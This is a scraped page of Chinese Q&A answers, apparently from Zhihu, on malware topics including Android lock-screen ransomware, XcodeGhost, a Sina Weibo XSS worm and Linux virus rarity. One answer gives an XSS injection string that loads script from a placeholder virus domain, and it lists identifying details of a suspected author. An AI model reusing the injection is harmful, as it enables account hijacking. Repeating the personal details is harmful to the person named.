- 吾爱破解论坛&i class=&icon-external&&&/i&&/a&提供的病毒样本&br&和这位坛友&a href=&///?target=http%3A///thread--1.html%25E6%258F%%25BE%259B%25E7%259A%%E6%25AF%%25A0%25B7%25E6%259C%25AC%25E7%259A%2584MD& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&/thread--1.html提供的病毒样本的MD&i class=&icon-external&&&/i&&/a&值是一样的，应该是同一个病毒也希望大家参与进来破解锁机密码，精力有限。&br&&br&=======================================================================================================================================&br&锁屏密码和锁机密码在上面的报告中找，但是第3个锁机密码的问题，想的不是很明白。&br&锁屏密码有两个分析是 && 和 &4650&，后面的锁机密码是 &薄荷终究是心凉& ---但是貌似有点问题，大家一起讨论下。。&br&============================================================================================================&br&&br&附件中是脱壳后的样本dex文件和报告的PDF格式，论坛的图片显示不是很清楚。&br&===============================================&br&类似的帖子：&br&&a href=&///?target=http%3A///thread--1.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Android最新敲诈者病毒分析及解锁&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A///thread--1.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Android敲诈者病毒“安卓性能激活”分析（2015年9月版）&i class=&icon-external&&&/i&&/a&
这种木马软件去年就出现了，有在“安卓吧”的网友应该都听说过”薄荷大神“。（不知道的可以进去了解下）后来吧友求助与吾爱破解，然后有大神分析了整个过程。以下为转载帖子内容：=========…
来自子话题：
瑞星最成功的产品是“瑞星小狮子”，这是对一个不思进取的传统型杀毒安全企业最大的讽刺：&br&&img src=&/d2edaea356fe2487cfb8_b.jpg& data-rawwidth=&277& data-rawheight=&257& class=&content_image& width=&277&&&img src=&/bea22ec5849_b.jpg& data-rawwidth=&672& data-rawheight=&646& class=&origin_image zh-lightbox-thumb& width=&672& data-original=&/bea22ec5849_r.jpg&&
瑞星最成功的产品是“瑞星小狮子”，这是对一个不思进取的传统型杀毒安全企业最大的讽刺：
来自子话题：
&blockquote&我记得近十年前的时候，平时上网即使装着杀毒软件动不动就中毒中木马&/blockquote&这是因为十年前的主流操作系统 Windows XP 安全性很差。&br&&blockquote&现在完全靠win8默认的Windows defender也从没出过问题。&/blockquote&这是因为 Windows 8 的安全性很好。&br&&blockquote&这种变化是客观存在的还是我的错觉？&br&&/blockquote&这种变化是客观存在的。&br&&blockquote&又是什么原因改变了网络环境了呢？&/blockquote&所以这主要不是网络环境的变化，是系统环境的变化。
我记得近十年前的时候，平时上网即使装着杀毒软件动不动就中毒中木马这是因为十年前的主流操作系统 Windows XP 安全性很差。现在完全靠win8默认的Windows defender也从没出过问题。这是因为 Windows 8 的安全性很好。这种变化是客观存在的还是我的错觉？这…
来自子话题：
我只回答一下后面的一句话：这种事情需要修改 ROM 中的程序，所以只要参与的人必然知道，你只要能访问 ROM 代码的人都可以看见。&br&&br&就我所知道的情况而言，就职过的公司没有出现过在 ROM 中植入类似恶性后门的情形。所以&b&那些声称「这是天下乌鸦一般黑」的人，纯粹是花样给酷派洗地，请无视他们&/b&。我希望有更多其他公司的码农们能够理直气壮的站出来告诉大家，你们并没有做出象酷派一样的事情。&br&&br&有少数的情况下会是运营商植入后门，不过运营商植入的后门不会有那么大的权限，一般不会有明显的恶意，而且只要不购买运营商定制机就不会有。&br&&br&当然，对于裸机来说，要说完全没有后门也是不可能的，毕竟设备需要维修调试，所以厂商一般会有后门允许在特定物理接触的情况下把设备设定到调试模式，允许进行正常的程序维护，这种后门至少在我看来算是良性的，也是业界都可以理解的。
我只回答一下后面的一句话：这种事情需要修改 ROM 中的程序，所以只要参与的人必然知道，你只要能访问 ROM 代码的人都可以看见。就我所知道的情况而言，就职过的公司没有出现过在 ROM 中植入类似恶性后门的情形。所以那些声称「这是天下乌鸦一般黑」的人，…
来自子话题：
&a href=&///?target=http%3A///images/t.js& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&/images/t.js&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&&br&XSS代码：&a href=&///?target=http%3A///pub/star/g/xyyyd%3cscript%2520src%3D//www& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/pub/star/g/xy&/span&&span class=&invisible&&yyd%22%3e%3cscript%20src=//www&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&.病毒地址.cn/images/t.js%3e%3c/script%3e?type=update&br&&br&新浪名人堂部分XSS过滤不严&br&&br&攻击原理分析：&a href=&///?target=http%3A//d.pr/Flsl& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&d.pr/Flsl&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&源 .js 文件内容：&a href=&///?target=http%3A//d.pr/rHiB& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&d.pr/rHiB&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&
（海均提供）&br&&br&========================================&br&&br&病毒作者微博
&a href=&///?target=http%3A///n/hellosamy& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/n/hellosamy&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& （已河蟹）&br&遗照 &a href=&///?target=http%3A///zjc5s4.jpg& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/zjc5s4&/span&&span class=&invisible&&.jpg&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&br&Domain Name: &a href=&///?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&Registrant Organization: 北京新网数码信息技术有限公司&br&Registrant Name: 张志 &br&Administrative Email: &br&&br&疑似病毒作者信息：&br&I D名：lin5-61&br&真实姓名：朝森&br&性别：男&br&毕业院校及专业：武汉科技大学&br&职业：写代码（JAVA）&br&联系方式：QQ&br&&br&QQ空间： &a href=&///?target=http%3A//user./& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&user./46142&/span&&span class=&invisible&&932&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a& &br&问题：我是哪里人？&br&回答：海南。
脚本 XSS代码：.病毒地址.cn/images/t.js%3e%3c/script%3e?type=update新浪名人堂部分XSS过滤不严攻击原理分析：源 .js 文件内容： （海均提供）=======================…
来自子话题：
乃们可不可以点个赞呢。。。&br&看在我名字的份上&br&&br&1&br&很久以前，我让一个黑客朋友盗号。&br&他带来了一个机械键盘，打开了十一个qq窗口。&br&他开始在不同的窗口间切换，并且输入密&br&码。&br&他输入密码的速度太快了，快到我看不清。&br&”我只听见键盘的声音。&br&他说，你不急的话可以先去睡一觉。&br&一觉醒来，我看到了一个文本文档，里面只&br&有一串数字。&br&&br&嘿!还真行!&br&后来我问他，你是怎么做到的。&br&他告诉我这就暴力破解。&br&我问他为什么是十一个窗口。&br&他说他不喜欢二。&br&他还说：“不要随便上黄色网站。”&br&&br&&br&一百个赞更一个&br&&br&&br&再来一个&br&从前，小明喜欢玩电脑。&br&后来，他的电脑坏了。&br&他请来一个叫做小红的高手。&br&小红看了看，告诉他是cpu的问题，只能换。&br&小明问他，没有别的办法了吗？&br&小红想了想，说有。你去帮我借一个万用表和一个烙铁，再买一箱三极管。&br&小明看他把cpu拆下来，开始焊三极管。&br&小红告诉他，你要是不急，可以先睡一觉。&br&再后来，电脑好了。&br&就是cpu体积增大了好多倍。&br&小红留下一个字条：&br&“别玩lol的时候超频。”&br&&br&&br&&br&3转&br&小明的电脑又坏了。&br&小红又被请来了。&br&小红告诉他，操作系统坏了，只能重装。&br&小明问她，没有别的办法了吗？&br&小红让小明等等，她回家取来了一个键盘。奇怪的是，上面只有十六个键，ABCDEF。&br&她打开电脑，又开始敲键盘。&br&小红问小明，要Windows还是linux。&br&Windows，小明回答道。&br&小红继续，过了半个小时，她说刚刚写好win7的内核，还得写点别的做做美化，要是等不及可以先睡一觉。&br&小明睡起来后，发现熟悉的windows图标已经出现了。&br&小红已经走了，旁边有一张字条：&br&以后别用盗版。&br&&br&&br&4转&br&小明真是不小心，电脑又坏了。&br&自然而然，小红来了。&br&小红说，你的硬盘坏了。&br&小明问道该怎么办。&br&小红告诉他只能再换一个。&br&小明问他，没有别的办法了吗？&br&小红想了想，问他要了一块磁铁。&br&小红把硬盘拆下来了。&br&他打开硬盘，看了看磁碟，手拿着磁铁在上面不时点一下磁碟，不时划一个圈。&br&“引导区已经好了，快试试吧。”&br&电脑打开了，又看到了小红的windows图标。&br&小红留下一句：&br&“别用360。”&br&&br&5&br&小明的电脑开不开机了。&br&或者说，进不去系统了。&br&小红当然又来了。&br&小红告诉小明，键盘坏了。&br&小明惊讶键盘坏了为什么进不去系统。&br&小红告诉他自己也不知道，但是看样子需要换一个键盘了。&br&然而小明并不想换键盘。&br&小红问小明要来了五百块钱。&br&于是，小红买到了一款小米（不是软文）机械键盘。&br&小红把小明原来那个键盘的键帽和壳子撬开，发现原来是进水短路了。&br&于是他把小米键盘的键帽全部换成了老键盘的，这看起来和原来的一样。&br&小明打开电脑，发现温斗士骑的登陆界面多了一个账户。&br&“不要用我的迅雷会员下载成人电影，实在需要的话自己去私人空间”
乃们可不可以点个赞呢。。。看在我名字的份上1很久以前，我让一个黑客朋友盗号。他带来了一个机械键盘，打开了十一个qq窗口。他开始在不同的窗口间切换，并且输入密码。他输入密码的速度太快了，快到我看不清。”我只听见键盘的声音。他说，你不急的话可以…
来自子话题：
前几年正好研究过这个。Wine 下的恶意代码可以感染 Wine 环境，也可以感染 Linux 环境。因为 Wine 只是实现了 Windows 环境仿真，并未做环境隔离。 Win32 API 和 int 0x80 在 Wine 下都可调用成功。
前几年正好研究过这个。Wine 下的恶意代码可以感染 Wine 环境，也可以感染 Linux 环境。因为 Wine 只是实现了 Windows 环境仿真，并未做环境隔离。 Win32 API 和 int 0x80 在 Wine 下都可调用成功。
来自子话题：
VS2010以上版本反正是不能装在XP上面的了。&br&&br&只要你把VS装进C:\Program Files下面，然后打开UAC，可以保证病毒在修改VS的文件的时候要先征得你的同意，你可以根据需要来决定是否运行这个病毒。不过就算病毒运行了也不一定会成功的，因为VS的重要的文件都是有签名的，而且只要你不用命令行改配置，标记为需要签名的exe将无法加载没有签名的dll，而且.net framework的所有文件也是都签了名的。&br&&br&当你安装VS的时候，如果打开了UAC，这个时候VS要是被改了，UAC会变黄告诉你这个程序没有签名。如果百度改了VS他会告诉你这个VS是百度发行的。你可以根据需要来决定是否运行这个来历不明的安装程序。&br&&br&总之，在Windows7以及更新的系统，只要你开了UAC，并且正常的软件都不要给admin权限运行（VS的话也只有调试那些非得运行在admin的程序才需要用admin来启动VS），那任何病毒要运行之前都得先经过你的同意。当然了，你总是可以根据具体的需要，来决定是否运行病毒。&br&&br&不过操作系统总是不可避免的会有漏洞的。所以开了UAC虽然99%的情况下都安全了，但是还有那1%。不过解决方法很简单，只要你的开发机上只安装跟开发有关的东西，特别是不安装任何国产程序的话，那肯定是安全的。当然了，客户就是上帝，你总是可以根据具体的需要，来决定是否使用admin来安装三大全家桶的。
VS2010以上版本反正是不能装在XP上面的了。只要你把VS装进C:\Program Files下面，然后打开UAC，可以保证病毒在修改VS的文件的时候要先征得你的同意，你可以根据需要来决定是否运行这个病毒。不过就算病毒运行了也不一定会成功的，因为VS的重要的文件都是有…
来自子话题：
我确实认识一些不装安全软件的人。但他们都非常了解了解各种入侵手段，了解安全软件的利弊，了解在不装安全软件的情况下如何安全地使用计算机。&br&&br&但一般来说，不确定自己是不是应该装安全软件的人，都应该装安全软件。
我确实认识一些不装安全软件的人。但他们都非常了解了解各种入侵手段，了解安全软件的利弊，了解在不装安全软件的情况下如何安全地使用计算机。但一般来说，不确定自己是不是应该装安全软件的人，都应该装安全软件。
来自子话题：
混淆视听的声明，是一个恶意软件和后门，分析见 &a href=&///?target=http%3A//mp./s%3F__biz%3DMzIwMTI4Nzk5Ng%3D%3D%26mid%3Didx%3D1%26sn%3D109d3415aa95bbb7ca80c%26scene%3D0%23rd& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&mp./s?&/span&&span class=&invisible&&__biz=MzIwMTI4Nzk5Ng==&mid=&idx=1&sn=109d3415aa95bbb7ca80c&scene=0#rd&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&br&摘录一段：&br&&br&&p&&strong&6.&/strong& 在@Saic的提示下我们发现受感染的app还拥有接收黑客在云端的命令并按照黑客的指令发送URLScheme的能力：&br&&/p&&p&URLScheme是iOS系统中为了方便app之间互相调用而设计的。你可以通过一个类似URL的链接，通过系统的Openurl来打开另一个应用，并可以传递一些参数。一个恶意的app通过发送URLScheme能干什么呢？&br&&/p&&p&&1&.可以和safari进行通讯打开钓鱼网站。&/p&&p&&2&.可以和AppStore进行通讯诱导用户下载其他AppStore应用。&/p&&p&&3&.可以和itms-services服务通讯诱导用户下载无需AppStore审核的企业应用。&/p&&p&&4&.向支付平台通讯发送欺骗性的支付请求等。&/p&
混淆视听的声明，是一个恶意软件和后门，分析见 摘录一段：6. 在@Saic的提示下我们发现受感染的app还拥有接收黑客在云端的命令并按照黑客的指令发送URLScheme的能力：URLScheme是iOS系统中为了方便app之间互相调用而设计的。你可以通过…
来自子话题：
“搞计算机的，不过不会修电脑”。
“搞计算机的，不过不会修电脑”。
来自子话题：
下载速度慢是国内的原因，我一直以来尝试各种办法来实验。&br&&br&改 DNS 是一种简单易行的办法，但是有效率不高，而且我通常不太相信那些不知来路的 DNS。&br&&br&目前我使用的方法：&br&&br&首先你最好有个大陆区账户。当你下载 Xcode，OS X 这种危险性较大的 App 时，这个账户可以派上用场。首先挂着一种你信赖的那种工具登录账户，找到你要下载的东西，点击 Download，等到开始下载后，点击 Suspend 然后断掉那种工具，刷一下 DNS 缓存，然后点击 Continue，这时你就可以被导到国内的 CDN 上了，几本就是满速。&br&&br&以上方法，我用北京联通，北京宽带通 (联通)，北京电信多个网络测试过，屡试不爽，&br&&br&目前我宽带是电信 50M，以上方法下载 EI Capitan，Xcode 等等，都是 7MB/s。我很满意，
下载速度慢是国内的原因，我一直以来尝试各种办法来实验。改 DNS 是一种简单易行的办法，但是有效率不高，而且我通常不太相信那些不知来路的 DNS。目前我使用的方法：首先你最好有个大陆区账户。当你下载 Xcode，OS X 这种危险性较大的 App 时，这个账户可…
来自子话题：
&blockquote&Linux系统下的病毒少是为何？
——转载自《开源时代》第二期 &br&
可能不少人持这样一种观点，认为 Linux病毒少是因为Linux不像Windows那么普及，其实这种观点很早已经被人批驳过了，一个最有力的论据是：如果写病毒的人写 Windows病毒是因为 Windows 用户多而因此破坏性大，那么 Internet 上服务器大多是基于 Unix/Linux的，攻击这些服务器，破坏性岂不是更大么？
&br&　　对一个二进制的 Linux 病毒，要感染可执行文件，这些可执行文件对启动这个病毒的用户一定要是可写的。而实际情况通常并不是这样的。实际情况通常是，程序被 root 拥有，用户通过无特权的帐号运行。而且，越是没有经验的用户，他拥有可执行文件的可能性就越小。因此，越是不了解这种危险的用户的主目录越
不适合病毒繁殖。即使这个病毒成功地感染了这个用户拥有的一个程序，由于这个用户权限受限，它进一步传播的任务也会非常困难(当然，对于运行单用户系统的 Linux 新手，这个论证可能不适用。这样的用户可能会对 root 帐户比较粗心)。
&br&　　Linux 网络程序构建地很保守，没有使现在Windows 病毒如此快速传播变的可能的高级宏工具。这并不是 Linux 的固有特征；它仅仅是两种用户基础的不同和这种不同导致的在这两种市场中的成功产品的不同的反映。通过观察这些问题学到的经验也会被用到将来的 Linux产品中。Linux的应用软件和系统软件几乎都是开源的。这对病毒有两方面的影响。首先，病毒很难藏身于开源的代码中间。其次，对仅有二进制的病毒，一次新的编译安装就截断了病毒一个主要的传播途径。虽然 Linux 发行商也提供大量的二进制软件包，但是用户大都是从发行商提供的可靠的软件仓库中下载这些软件包，大都具有 md5 验证机制，安全性极高。这些障碍每一个都是病毒成功传播的一个重要阻碍。然而当把他们放在一起考虑的时候，基本的问题才浮现出来。一个计算机病毒，像生物病毒一样，要想传播开来，其繁殖速度必须超过其死亡(被消灭)的速度。上面提到的障碍有效地降低了 Linux 病毒的繁殖速度。如果它的繁殖速度降到取代原来种群所需要的阈值之下，那么这个病毒的厄运从一开始就注定了——甚至在潜在受害人意识到它们之前。
&br&　　我们没有看到一个真正的 Linux 病毒疯狂传播，原因就在于存在的 Linux 病毒中没有一个能够在 Linux 提供的敌对的环境中茁壮成长。现在存在的 Linux 病毒仅仅是技术上的好奇；现实是没有能养得活的 Linux 病毒。当然，这并不意味着永远没有 Linux 病毒能够流行。然而它确实意味着，一个成功的 Linux 病毒要在不适合生存的 Linux 生态系统中存活下来，那么它就必须是精心制作并具有创新性的。&/blockquote&&br& 关于mac OS
&br& max OS 是UNIX BASE 的操作系统
关于linux Linux系统下的病毒少是为何？ ——转载自《开源时代》第二期 可能不少人持这样一种观点，认为 Linux病毒少是因为Linux不像Windows那么普及，其实这种观点很早已经被人批驳过了，一个最有力的论据是：如果写病毒的人写 Windows病毒是因为 Windows …
来自子话题：
&img src=&/ff33caf67f265c0535ecb95d00dada7e_b.png& data-rawwidth=&1080& data-rawheight=&721& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&/ff33caf67f265c0535ecb95d00dada7e_r.png&&&br&另外，这病毒有几点引人注意:&br&&ul&&li&攻击范围较小，针对性强&/li&&li&收集gmail、以信息情报收集为主&br&&/li&&li&主要针对国内用户&/li&&li&木马将数据封装成固定包头的DNS协议包，发送到大型网站来实现数据传输，此方法可以绕过几乎全部的防火墙，但是黑客要截取这些数据，必须在网关进行劫持嗅探；因此可以推定受害者网络链路上存在劫持&/li&&li&可突破绝大多数杀软、利用漏洞自行提权&/li&&/ul&那么很有可能....
另外，这病毒有几点引人注意:攻击范围较小，针对性强收集gmail、以信息情报收集为主主要针对国内用户木马将数据封装成固定包头的DNS协议包，发送到大型网站来实现数据传输，此方法可以绕过几乎全部的防火墙，但是黑客要截取这些数据，必须在网关进行劫持嗅…
来自子话题：
&p&应该判刑呀，随便一条都够判个几年的了。&br& 这样如果都不判，那以后大家还不肆无忌惮的种各种木马了？互联网上所有人都可以有恃无恐的黑别人了。现在连网上下个东西都要当心下到木马，这个人不处理，不知道以后还会下到些什么。&br&&br&&/p&&p&随便说两个案例，虽然有点不一样，但是做法都很类似，基本上是判三年：&/p&&p&&a href=&///?target=http%3A///archives/1280.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&珊瑚虫QQ作者被判入狱三年罚款120万元&i class=&icon-external&&&/i&&/a&&/p&&p&&br&&a href=&///?target=http%3A///a/283.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&番茄花园案一审宣判：洪磊判刑三年半罚100万_IT新闻&i class=&icon-external&&&/i&&/a&&/p&&br&&p&刚跑到作者 github 主页上劝其自首了。&/p&&p&&a href=&///?target=https%3A///XcodeGhostSource/XcodeGhost/issues/52& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&应该判刑 · Issue #52 · XcodeGhostSource/XcodeGhost · GitHub&i class=&icon-external&&&/i&&/a&&/p&
应该判刑呀，随便一条都够判个几年的了。 这样如果都不判，那以后大家还不肆无忌惮的种各种木马了？互联网上所有人都可以有恃无恐的黑别人了。现在连网上下个东西都要当心下到木马，这个人不处理，不知道以后还会下到些什么。随便说两个案例，虽然有点不一…
win10mobile表示不懂这个！
win10mobile表示不懂这个！
来自子话题：
记得以前带病毒的Delphi么，和那个能做到的事情差不多，不过那个Delphi sysconst.dcu病毒感染的目标是Delphi本身&br&据分析，这次的病毒和之前的假冒越狱插件盗取Apple ID的病毒使用了相同的控制服务器域名，有可能是同一个黑产团体做的&br&&a href=&///?target=http%3A//www./threat-centre/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Novel Malware XcodeGhost Modifies Xcode, Infects Apple iOS Apps and Hits App Store&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A///2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia&i class=&icon-external&&&/i&&/a&&br&&br&XCode至少在国内下载除了速度慢并没有硬性的障碍，而细思恐极的是，Android Studio、Android SDK在国内因为众所周知的原因难以从官方下载，如果黑产团体放出针对它们的编译器病毒，然后在国内提供篡改过的镜像下载，那就可能有非常大的危险了。&br&&br&
我们关心这个问题的人自然清楚这之间的危险性，我们会搭梯子，会校验数字签名和HASH，但是也许有一些开发流行应用的开发者并不清楚。&br&&br&分隔线&br&&br&其实那个带病毒的delphi由于病毒可以看到源码，有人改过它的加强版，比如定期删除硬盘里的.pas文件的，把.pas文件打包发邮件的
记得以前带病毒的Delphi么，和那个能做到的事情差不多，不过那个Delphi sysconst.dcu病毒感染的目标是Delphi本身据分析，这次的病毒和之前的假冒越狱插件盗取Apple ID的病毒使用了相同的控制服务器域名，有可能是同一个黑产团体做的
已有帐号？
无法登录？
社交帐号登录}